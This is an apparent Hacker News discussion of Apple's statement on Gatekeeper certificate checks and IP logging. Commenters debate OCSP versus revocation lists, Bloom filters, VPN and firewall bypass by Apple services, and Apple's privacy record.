macOS has been designed to keep users and their data safe while respecting their privacy.
Gatekeeper performs online checks to verify if an app contains known malware and whether the developer’s signing certificate is revoked. We have never combined data from these checks with information about Apple users or their devices. We do not use data from these checks to learn what individual users are launching or running on their devices.
Notarization checks if the app contains known malware using an encrypted connection that is resilient to server failures.
These security checks have never included the user’s Apple ID or the identity of their device. To further protect privacy, we have stopped logging IP addresses associated with Developer ID certificate checks, and we will ensure that any collected IP addresses are removed from logs.
In addition, over the the next year we will introduce several changes to our security checks:
* A new encrypted protocol for Developer ID certificate revocation checks
* Strong protections against server failure
* A new preference for users to opt out of these security protections
Google or Facebook would not post this because they would be combining the data. Instead it would be some meaningless claim that they don’t use the data for advertising or don’t sell the data, leaving themselves free to do anything else with it (plus, the “we can change the terms at any time” clauses)
I would argue it's because Google has to value security and privacy in a way Apple doesn't - Google has to build platforms instead of gardens, so there's an 'adversarial' incentive to make sure you're not held liable due to a 3rd parties actions.
Also, these incidents would be a thermonuclear event for search due to the intimacy and inherent 'Internet-ness' of the data - versus Apple, who can get away with incidents like introducing Intelligent Tracking Prevention - two years later, it turned out it was a globally unique identifier that also leaked your web history [1] Yet, because Apple didn't have a perceived incentive to leak this information, people see it as a 'mere' competency issue and move on.
Nah it’s because Google and Facebook earn their money with advertising, which implies data. Apple, on the other hand, earns their money by selling hardware.
It’s a different value exchange, and Apple doesn’t really have a lot to gain by becoming a “bad actor” with data. See also, for example, their planned advertising tracking protections coming up in 2021. They don’t have a lot to lose in this area, and a lot to gain.
I think that analysis is adequate for describing why Apple shouldn't be a bad actor with data, but, they meet the criteria for one - the security incidents the past couple years (supercookie, history leak, root, leaking app launches in plaintext...), assisting government access, softening E2E encryption to de facto unencrypted...
>If this was from Google or Facebook, there’d be angry mob about how dear they logged IP in the first place.
Google and Facebook already do that. And of course with them there's no way to stop it either for most of their properties, as they're 100% web based.
Plus, in the excerpt you're quoting the say they stopped logging IP address for dev tests -- logging those (and more) are par for the course in all kinds of debug environments (from MS, Oracle, etc.), that Apple doesn't anymore is probably impressive.
This IP logging might not be legal under GDPR, Apple did not need the IP for this purpose of revoking a certificate and it was proven that almost all user had no idea that this even happens each time they launch an app. But the cherry on the cake is that all of this was not encrypted so even if a users would have accepted this stuff with the TOS dark pattern they did not accepted that this data would be visible but third parties.
A few years/months ago this would have been considered a conspiracy, today is just fine for most because "think about my mother" , I agree with the secure by default but don't forget that when Apple decides or is "forced" to remove an application you have no workaround on iOS around that and this "feature" will come to the laptop and desktop if users don't demand it and keep bringing the mom argument.
There has been an angry mob. This week I learned (from HN) that because I prefer macOS I must be suffering from Stockholm syndrome, enabling technology dictatorships and generally bringing about the end of the world.
> A new encrypted protocol for Developer ID certificate revocation checks
Apple's online verification scheme still seems to be the wrong approach both for privacy (since it leaks information) and for security (since apps still need to keep working offline and during service outages.) Encrypted queries can still leak information to observers, and we apparently still have to trust Apple to "remove" information from their logs (rather than simply not logging to begin with.)
Dev certificate revocations are rare enough that they can be handled by periodic updates to an on-device revocation list. This is similar to what Chrome does with its CRLSet.
I am still waiting for someone providing a plausible explanation as to why it has to be online check and not like AntiVirus where signatures are pushed to the client.
Instead everything were derailed into Apple Data Collection.
Let it be known: one asshole yelling on his personal blog can bully the largest company in the world into encrypting their shit and deleting their logs, and, most importantly, providing a way of turning it off.
Remember that, kids. I’m as surprised as you are.
Now I have an even bigger and more difficult writing task ahead of me: rms cold emailed me today to ask me, point blank (and presumably non-rhetorically), why I am still running macOS.
That’s going to be a doozy, because he’s damn well right.
Apple listens to bad PR, the problem is that you have to be lucky, competent, or gifted enough to get it. Otherwise you might as well pound sand.
As for RMS…well, the issue is that the way he lives is just exceedingly difficult to keep up with in modern society. That being said, you could be instead taking steps to improve yourself by using Linux, but perhaps there exists a place in this world for people to slowly propose changes to macOS and make it better for millions of people alongside those who shout for radical change immediately. Maybe you should probe for what he thinks you should do.
There was absolutely a whole lot of luck involved here, no doubt. It wouldn’t have been possible at all without HN, dhh, Louis Rossmann and many, many others boosting the signal.
I’m just thrilled that so many people care about privacy. I mostly assumed it was a lost cause, given the status quo on mobile (where basically every app launch notifies 3+ companies and data brokers, with no way to turn it off).
Oh, what I wouldn’t give for Apple to sherlock Little Snitch and port it to iOS! I’m going to assume that their Safari ad privacy backtracking for Facebook means that this probably won’t happen, though.
good first start. What I still would like to see extra:
* option to notify user certificate got revoked. Short description why twitter style and link to details and give user choice to quarantine it or to still use it. This is in similar style what antiviruses do it telling you: 'this kind of malware name was potentially found but if we are wrong feel free to remove from quarantine'.
* revocation list is checked twice a day locally on the machine and twice a week (always on the same days) the current way remotely to strike a good balance as a default. Allow user to adjust frequency.
This should be added for literally every single "security" thing they've added since at least High Sierra. They've continually added features for improving system security that have proved to be major impediments to a computer being used as a general purpose computing device. A separate section (maybe under Security & Privacy, add in loads of warnings, I don't care) with a deep dive allowing users to enable/disable security features of macOS would be ideal
The general taboo asking users to even disable any of the security protections of macOS needs to disappear in my honest opinion. With Big Sur and Apple Silicon, I don't think that it's hyperbole anymore of a locked up macOS just tailored towards casual users and dragging along developers in the process.
While it's good that they're going to improve Gatekeeper's certificate checks, don't forget the other major issue raised recently: all of Big Sur's system network traffic is deliberately leaked around VPNs.
Will they change course on that issue? Or will you have to carry a raspberry pi around as a hardware firewall if you want to have an actually private network connection? (or alternately, not use a Mac)
That is unbelievable. Breaking VPNs is literally a life-or-death situation for many journalists and activists in certain countries; not to mention something that would (justifiably) give network admins a heart attack.
It also increases the attack surface, as malicious programs may find ways to hijack their traffic, or attach their traffic to OS traffic. All you need is an Apple service that relays the information somehow -- for example, a hypothetical Apple service that requests information/metadata from an application specified URL.
Believe me, I won’t be using a mac not via an external VPN router ever again. I already needed to take that step for iPad/iPhone and was putting it off. This sort of seals the deal, as all of the devices can use the same wifi device.
The 'malicious firewall bypass' is "lemme add a rule to bypass firewall, o gee, now I can bypass the firewall".
You can do this with any existing software firewall on any OS, here it just happens on a secondary whitelist (as opposed to the firewall configuration).
Right, but isn’t the issue then “I can trick a system service to do the malicious thing for me”? Apple’s apps are absolutely not secured against being convinced to make arbitrary outbound connections.
“I can trick a system service to do the malicious thing for me if I have root”, and that’s as designed, and something at least people on HN want (“I want control over what my hardware runs”)
If you have root, you can also remove Apple’s exceptions from that list. I haven’t checked, but that should fix the issue of Apple’s services bypassing firewalls.
I am very familiar with macOS's security features. Preventing an application from having something maliciously command them into sending things on the network is not one of the threat models Apple considers (or at least, they have no specific mitigations against this). As a simple (but conspicuous) example, consider an app simply opening a customized HTTP link if Safari was exempt from the firewall to exfiltrate information. There are hundreds of ways to do effectively the same thing more surreptitiously.
There are a million other ways to “convince” them when they are operating normally, which presumably these apps are not explicitly hardened/audited against.
That is false on current macOS. There have been many additional protections (rootless, SIP, SSV, eradicating kexts) against uid=0 malware added to the macOS over the last 5-6 years, and rightfully so.
Even unprivileged user apps can’t read and write to every file their POSIX permissions say they should be able to, due to things like ransomware. When apps want to read or write certain directories, an additional permission dialog is displayed.
I am not aware of any other desktop OS that implements these sorts of protections. How you describe it is definitely how it works on Linux and Windows.
It is unbelievable. It also appears to not be true.
System-level VPNs apparently continue to work as always. It's the new app-level APIs used by programs like Little Snitch that are bypassed by Apple services.
Journalists, activists, and really anyone using something they would rightly consider a VPN, they're fine, because system-level VPNs aren't bypassed.
The VPN leak is only around per-application VPNs and filters, which is the mechanism used by firewalls like Little Snitch and LuLu. These can not be applied to Apple's apps.
System-wide VPNs thankfully don't have the same problem.
Can anyone weigh in on why Apple would prevent this? It's not as though redirecting the traffic from Apple's software will let you impersonate Apple (unless you've also been able to load your own fake certificates, in which case the client is already hosed). At worst you can selectively block them, no? And you can do that anyway with a hosts file.
This is in response to the issue last week where slowness of Apple's OCSP responders caused hangs in apps launching. It was a bad look for privacy-conscious Apple especially considering that basic OCSP queries are unencrypted HTTP requests.
In my post (https://blog.cryptohack.org/macos-ocsp-disaster) I argued that OCSP was inherently a poor way to perform certificate revocation in this scenario, and that an approach based on Certificate Revocation Lists (CRLs) could be preferable. Regardless, it looks like Apple might be doubling down on OCSP but encrypting the requests, or possibly adding a new protocol altogether.
> But it’s also fundamentally different since Apple has total control over its own chain of trust. Other certificate authorities are not allowed to issue valid certificates for code signing as all certificates must chain back up to Apple.
To me this was the most curious part of the entire situation. The post briefly mentions CRLite and bloom filters; they rely on the list of all if not most valid certificates (which were impossible before CT) and it's understandable that they are not yet widely deployed. But Apple does surely know the list of all developer certificates and can simply publish a (probably compressed) list of serial IDs of revoked developer certificates that would be otherwise valid. I don't see a good reason to use big moving parts like OCSP here especially given the soft-fail behavior.
Since Bloom filters allow for false positives, wouldn’t that make them inappropriate here? You wouldn’t want a valid certificate to be perceived as revoked. (I recognize that I’m probably wrong, given that Mozilla is doing this - where is my mistake in logic?)
Mozilla's solution to this is to run every single certificate in the CT log through the filter, and remedy any false positives with an extra layer. The filter also has a date attached, so potential false positives that are newer than the filter can be checked with OCSP.
That would be better than what we have here, though, where every application launch gets checked. The fallback with a Bloom filter is that you check a few apps, not all of them.
I think the idea is that false positives (cert revoked) result in a call home to Apple for an actual check.
The other idea is that because Apple knows all existing certificates, they could conceivably construct filters that have no false positives for those existing certificates... sort of like construction of a perfect hash.
You are misunderstanding. The bloom filter is only a preliminary check; if it indicates a revoked certificate, you then verify that it's a true positive the traditional way.
I really like this because of the increased privacy (apple doesn't know which apps you run) as well as the better error mode. If their servers go down, the worst that can happen is that an update of the revocation list fails, which means they can't get new revocations out to people. But it's not that apps won't start any more.
Seriously, why do they have to collect ANYTHING without opt-in? People pay them for hardware, their revenue stream has a different source than facebook or google.
I think it's fear (useful telemetry) or greed (valuable telemetry) or vanity (look how many people launch x).
Really, just do it. So some customers shoot themselves in the foot. That is how they learn. Others who are perfectly capable of managing things will also be happy with actual privacy. That is how trust is built up, and with trust comes unfettered trade.
Right now power users are alienated, regular customers feel deceived and apple could just do better.
While I'm a fan of having a choice (as I consider myself a "power user"), I do think Apple is making the right decision in making certain things (like this OCSP check) default-on. It is true that the overwhelming majority of Apple users won't ever know enough of the technical details to make an informed decision about this, nor should they need to know.
Where Apple went wrong, IMHO, is:
1) not giving people a way to opt out (not just for OCSP, but so many power user-hostile decisions they're making recently), and
2) programming it in a poor way where slow responses ground the machine to a halt (it did mine in the middle of the work day, stopping my work completely for 30-45 minutes).
I don't think malice (i.e. greed) was involved in how this whole thing turned out. As Hanlon's Razor states:
Never attribute to malice that which is adequately explained by incompetence.
They also did wrong by not encrypting the connection, and by not doing it in a privacy-preserving way like with a bloom filter precheck. This is a company that has world class cryptosystem designers on staff, remember. They know how to pcap a fresh install before the GM goes out the door to see if it’s still speaking plain HTTP like OSes did in the years back before we ever heard the name Ed Snowden.
Cut them some slack, but not an infinite amount. They can and should well know better, and pledging to delete the logs, encrypt it, and add a knob to turn it off is as close to a “we fucked up” as you’ll ever get from them.
They aren’t collecting anything. This isn’t a telemetry feature. It’s more like antivirus. Before it lets an app run, it queries an online blocklist. Apple uses this to immediately shut down attacks on their customers. People who have been hit by ransomware and lose their entire digital life really do appreciate features like this.
Apple has a different, unrelated telemetry feature that is clearly labeled.
While everyone on HN (including me) is mad about the privacy implications of what's happening here - including how all this doesn't do much good for programmers dealing with all kinds of binaries updated daily, I quickly want to point out that I think this type of functionality is a great idea for most non technical users. Apple has always been at the forefront of extreme usability (kids using iPads, seniors sending iMessages) and the internet has a lot of toxic stuff that needs to be kept away from many non technical users (for my parents' computer, I rather have this ping home to Apple with hashes of apps they open than them being exposed to tons of malware). That said they really need to work on the privacy aspect..
"Apple has always been at the forefront of extreme usability (kids using iPads, seniors sending iMessages)"
I've always understood this to be a marketing victory on Apple's side. From what I've seen, using Mac/iOS isn't any easier or more difficult than Windows/Android.
I feel the complete opposite way. I’ve had to witness my grandfather’s Windows 10 laptop just be absolutely trashed by malware that used all the saddest tricks like fake “log in to Facebook” windows. It’s absolutely horrendous and in my opinion rather inevitable.
Are there even a single example that anyone can point me to of this kind of borking happening to Macs?
I second this. Once I setup my mother with a Mac all the support I was doing for basic things like the WiFi not working or her pc being completely infected with viruses went to zero. I now only helped her with learning more about the programs she was using to create documents, look up stuff, send emails and messages, etc.
My parents (in their mid 60's) haven't had issues with this. Not saying your point isn't valid--just the one data point I have to draw from.
My relatives recently bought a Mac because they liked how it looked (big on interior design). They couldn't figure out how to navigate up a directory in Finder or access files from an external hard drive.
And yet when I tried Nexus tablets with all my elders and hangouts or skype whatever video call app was around then, they couldn’t figure it out.
As soon as I gave them all iPad mini and iPhone, they all found it easier to FaceTime.
Although, the chat issue was solved by WhatsApp in my opinion, by requiring phone numbers thereby reducing the need for passwords and reducing spam, greatly simplifying chat for the non tech and English literate in my family.
In my extended family, WhatsApp is used for chatting and calling by 4-90 age group quite easily and successfully. For lot of people WhatsApp and Youtube are the internet.
FWIW, I do think Apple is targeting non-techies a lot, and really not caring much about tech users.
The developer experience on Apple tech is pretty bad and getting worse -- but for the other 99% of the people, Apple seems to be the best tool for them.
For me the fact that they are working on improvements (including the ability to disable these checks) is a reason to take Apple devices into consideration again
I've been soured by this whole episode tbh (and I'm big on the Apple ecosystem). I'm gonna hang on until there's a communication about Apple services in Big Sur bypassing Firewalls and VPNs
The principle here is good (check if the developer’s certificate is revoked) but the implementation is completely batshit. Why not cache the result and send a push notification through the centralized channels if there is a Sev1 revocation incident?
This is a really good point, there is no good reason to have millions of devices phone home for permission on every single app open. If Apple's claim is to be believed there are a million patterns that make more sense for achieving this goal. Blacklists, whitelists, caching, etc.
I get "never attribute to malice what can be explained by incompetence", but this is Apple. Are we to believe that this public, unencrypted endpoint was set up and is being called tens of millions of times a day because Apple engineers were too incompetent to come up with a better solution for something so fundamental (to Apple) as the security of the software running on their devices? And flying so blatantly in the face of their claim to protect user privacy?
This whole incident is completely bonkers. People should be getting fired over this and there should be an apology and a massive step back from this horrible, horrible approach.
This article by Jacopo Jannone refutes the notion that macOS sends an application's hash to Apple "on every single app open": https://blog.jacopo.io/en/post/apple-ocsp/
Also in that article, the OCSP protocol is supposed to go over HTTP and not HTTPS: "If you used HTTPS for checking a certificate with OCSP then you would need to also check the certificate for the HTTPS connection using OCSP."
Furthermore, the returned information apparently includes a timeout period for the result to be cached at the endpoint, and according to Jeff Johnson, Apple has raised that timeout in the wake of Thursday's incident from 5 minutes to 12 hours: https://lapcatsoftware.com/articles/ocsp.html
There's certainly room to argue about Apple's approach, but let's make sure we're arguing about the actual behavior.
The protocol in use is OCSP. The OCSP endpoint is part of the certificate. If I had to guess, I would say that they just relied on certificate validation features of the library they are using, not necessarily aware of all of the consequences.
Checking OCSP is a standard feature of many SSL libraries.
Doing what you suggest is an implementation outside of what standard libraries would provide and was probably completely out of scope until now when stuff started burning.
Don't call relying on standard features of an underlying library "batshit implementation". For the vast majority of cases going with what's already there is the way better solution than NIHing your custom thing
To be fair, they fully control the library they’re using, as they have their own x509 library and API in Core Foundation. But it also supports CRLs so I’m somewhat circumspect this is the reason.
More likely it’s the server side: CRLs have fallen out of popularity because they don’t work well for the scope of most CAs. On the web OCSP doesn’t have the drawbacks it does in this situation because servers themselves can staple OCSP responses instead of forcing the client to fetch them itself. Obviously the same doesn’t quite work for binaries sitting on a user’s disk.
> To be fair, they fully control the library they’re using, as they have their own x509 library and API in Core Foundation. But it also supports CRLs so I’m somewhat circumspect this is the reason.
yes. if of course it's their library. But I assume the caller was just calling some (imaginary) function like
validate_cert(cert, ENABLE_ALL_CHECKS);
and that was it.
That ENABLE_ALL_CHECKS would then go out to check the OCSP server was probably not immediately known or was just seen as something that's part of, well, enabling all checks without much additional thought.
Whether the certificate also lists a CRL endpoint and whether that imaginary ENABLE_ALL_CHECKS also checks that I don't know, but possibly neither did the person who called that (imaginary) function.
Heck, the function might even default to ENABLE_ALL_CHECKS internally at which point the author of this code in question might not even have been aware of the network calls.
> The principle here is good (check if the developer’s certificate is revoked)
How is that remotely good ? It makes it easy to bully / blackmail developer to abide to every Apple will and revoke a certificate in pure retaliation, cf. the Epic debacle. A central authority can't be trusted.
<quote>
Privacy protections
macOS has been designed to keep users and their data safe while respecting their privacy.
Gatekeeper performs online checks to verify if an app contains known malware and whether the developer’s signing certificate is revoked. We have never combined data from these checks with information about Apple users or their devices. We do not use data from these checks to learn what individual users are launching or running on their devices.
Notarization checks if the app contains known malware using an encrypted connection that is resilient to server failures.
These security checks have never included the user’s Apple ID or the identity of their device. To further protect privacy, we have stopped logging IP addresses associated with Developer ID certificate checks, and we will ensure that any collected IP addresses are removed from logs.
In addition, over the the next year we will introduce several changes to our security checks:
* A new encrypted protocol for Developer ID certificate revocation checks
* Strong protections against server failure
* A new preference for users to opt out of these security protections
</quote>